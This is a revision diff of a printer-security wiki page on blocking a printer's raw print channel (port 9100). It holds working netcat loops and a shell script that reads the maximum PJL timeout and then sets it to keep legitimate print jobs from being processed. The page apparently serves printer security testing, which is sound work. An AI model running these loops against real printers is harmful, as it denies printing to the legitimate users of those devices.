Difference between revisions of "Transmission channel"

From Hacking Printers
Jump to: navigation, search
 
Line 11: Line 11:
 
A more advanced version of this DoS attack which sets a higher timeout is given below.
 
A more advanced version of this DoS attack which sets a higher timeout is given below.
  
# get maximum timeout value with PJL
+
<syntaxhighlight lang=sh>
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
+
# get maximum timeout value with PJL
  grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
+
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
# connect and set maximum timeout for current job with PJL
+
  grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
+
# connect and set maximum timeout for current job with PJL
 +
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
 +
</syntaxhighlight>
  
 
While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.
 
While the PJL reference specifies a maximum timeout of 300 seconds <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-25</ref>, in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.
Line 21: Line 23:
 
To check the PJL timeout settings for you printer, [[PRET]] can be used as follows:
 
To check the PJL timeout settings for you printer, [[PRET]] can be used as follows:
  
<syntaxhighlight lang=sh>
+
./pret.py -q printer pjl
./pret.py -q printer pjl
+
Connection to printer established
Connection to printer established
+
 
+
Welcome to the pret shell. Type help or ? to list commands.
Welcome to the pret shell. Type help or ? to list commands.
+
printer:/> env timeout
printer:/> env timeout
+
TIMEOUT=15 [2 RANGE]
TIMEOUT=15 [2 RANGE]
+
        5
      5
+
        300
      300
+
</syntaxhighlight>
+
  
 
'''Who can perform this attack?'''
 
'''Who can perform this attack?'''

Latest revision as of 12:44, 21 January 2017

If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. This trivial denial of service attack can be improved by setting a high timeout value with PJL.

How to test for this attack?

Connecting to port 9100/tcp of a printer without closing the connection prevents most devices to accept new print jobs. Tests can be performed using the netcat [1] utility in a loop as shown below:

while true; do nc printer 9100; done

A more advanced version of this DoS attack which sets a higher timeout is given below.

# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
  grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done

While the PJL reference specifies a maximum timeout of 300 seconds [2], in practice maximum PJL timeouts may range from 15 to 2147483 seconds. Hence, this value is first retrieved be from the printer and then set in all further connections. The advantage of this approach is that the number of connections for an attacker to make is minimized while it is even harder for legitimate users to gain a free time slot (race condition) to deploy a print job. Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open.

To check the PJL timeout settings for you printer, PRET can be used as follows:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
       5
       300

Who can perform this attack?

Anyone who can access port 9100/tcp of a printer device. Note that this can even be accomplished with cross-site printing techniques as long as the website used to enforce XHR connections is kept open.



  1. Netcat – TCP/IP Swiss Army Knife, Hobbit, 1996
  2. Printer Job Language Technical Reference Manual, HP Inc., 1997, ch. 6-25